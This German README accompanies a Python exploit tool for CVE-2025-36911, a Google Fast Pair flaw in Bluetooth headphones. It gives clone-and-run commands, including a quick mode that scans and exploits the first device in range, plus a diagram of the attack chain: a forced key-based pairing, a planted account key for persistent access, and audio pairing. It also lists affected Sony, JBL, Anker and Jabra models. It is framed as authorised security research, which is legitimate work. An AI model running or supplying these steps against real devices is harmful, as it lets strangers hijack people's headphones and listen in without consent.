
Exploit der CVE-2025-36911 Sicherheitslücke in Python zum Testen unserer eigenen Ausrüstung
Fast Pair CVE-2025-36911 Exploit-Tool in Python zum Testen unserer Geräte
Autor: Sébastien Dudek (@FlUxIuS) @ Penthertz
Danksagung: whisperpair.eu für die Entdeckung und diese nette APK von @ZalexDev, die die Zeit für die Implementierung verkürzt hat wpair-app
Nur für autorisierte Sicherheitsforschung. Testen Sie nur an eigenen Geräten.
CVE-2025-36911 betrifft Google Fast Pair-Implementierungen auf Millionen von Bluetooth-Audiogeräten.
Normales Verhalten: Geräte sollten Pairing-Anfragen nur im Pairing-Modus akzeptieren (Taste gedrückt, Gehäuse geöffnet usw.)
Verwundbares Verhalten: Geräte akzeptieren schlüsselbasierte Pairing-Anfragen (KBP) jederzeit, selbst wenn sie im Leerlauf oder bereits gekoppelt sind.
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Scan for targets
python3 whisperpair-cli.py scan
# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Exploit
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER VULNERABLE DEVICE │
│ │
│ 1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│ (Find target) (Model ID visible) │
│ │
│ 2. Connect ──────────────────────► GATT Connection │
│ │
│ 3. KBP Request ──────────────────► Key-Based Pairing Char │
│ (Should be rejected ✗ NOT REJECTED! │
│ when not in pairing mode) (CVE-2025-36911) │
│ │
│ 4. Parse Response ◄────────────── BR/EDR Address │
│ │
│ 5. Write Account Key ────────────► Account Key Char │
│ (Persistent access) ✓ ACCEPTED │
│ │
│ 6. Classic BT Pair ──────────────► Audio Profiles (A2DP) │
│ (Game over) │
└─────────────────────────────────────────────────────────────┘
Das Tool probiert automatisch mehrere Strategien aus:
Getestet verwundbar (prüfen Sie Firmware-Updates):
| Befehl | Beschreibung |
|---|
scan | Live-aktualisierender BLE-Scan nach Fast-Pair-Geräten |
scan -a | Alle BLE-Geräte scannen |
info <addr> | GATT-Dienste/-Eigenschaften anzeigen |
test <addr> | Nicht-invasiver Schwachstellen-Check |
exploit <addr> | Vollständige Exploit-Kette |
exploit -q | Auto-Scan und erstes Ziel ausnutzen |
| Marke | Modelle |
|---|
| Pixel Buds Pro 2 (erhält aber mit Pixel-Telefonen ziemlich schnell Updates) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| + viele weitere | whisperpair.eu |